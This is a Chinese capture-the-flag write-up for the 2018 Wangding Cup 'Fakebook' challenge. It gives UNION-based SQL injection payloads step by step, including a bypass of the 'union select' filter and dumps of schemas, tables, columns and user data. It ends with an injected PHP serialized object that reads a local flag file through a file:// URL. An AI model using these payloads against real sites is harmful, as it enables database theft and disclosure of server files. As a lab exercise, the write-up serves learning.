[网鼎杯 2018]Fakebook1

打开题目

先创建用户,登录试试

观察网址,这是一道注入的题目

测试注入列数

说明注入列数为4

测试注入点

union select 被过滤

替代?no=0 union all select 1,2,3, 4 %23

2是注入点

爆数据库

?no=0 union all select 1,group_concat(schema_name),3, 4 from

information_schema.schemata %23

爆表名

?no=0 union all select 1,group_concat(table_name),3, 4 from

information_schema.tables where table_schema='fakebook' #

爆字段

?no=0 union all select 1,group_concat(column_name),3, 4 from

information_schema.columns where table_name='users' #

爆数据

?no=0 union all select 1,group_concat(data),3, 4 from fakebook.users #

构造序列化结果

data中的数据

?no=0 union all select 1,group_concat(data),3, 'O:8:"UserInfo":3:{s:4:"name";s:5:"admin";s:3:"age";i:12;s:4:"blog";s:29:"file:///var/www/html/flag.php";}' from fakebook.users #

最后查看源码,看到base64,解码得到flag

相关推荐
别来无恙blwy19 小时前
windows MongoDB升级-自动升级脚本-自动检测升级到任意版本
数据库·windows·mongodb
步辞19 小时前
Redis如何利用LFU算法优化缓存命中率
jvm·数据库·python
~小先生~19 小时前
sqlserver 外键、级联使用
数据库·sqlserver
forEverPlume19 小时前
golang如何实现日志按级别过滤_golang日志按级别过滤实现教程
jvm·数据库·python
m0_6245785920 小时前
MySQL主从复制支持跨版本吗_不同版本间同步的注意事项
jvm·数据库·python
2401_8714928521 小时前
如何在 React Router v6 中正确配置多路由组件显示
jvm·数据库·python
Fᴏʀ ʏ꯭ᴏ꯭ᴜ꯭.21 小时前
《redis-cluster 集群部署完全手册(含扩容+缩容)》
数据库·redis·缓存
snow@li1 天前
数据库-MongoDB:常用语法 / MongoDB 核心知识技能梳理
数据库·mongodb
想躺平的小羊1 天前
关于金额在数据库设置类型问题
数据库
zhangchaoxies1 天前
MySQL触发器能否监控特定用户操作_结合审计功能实现分析
jvm·数据库·python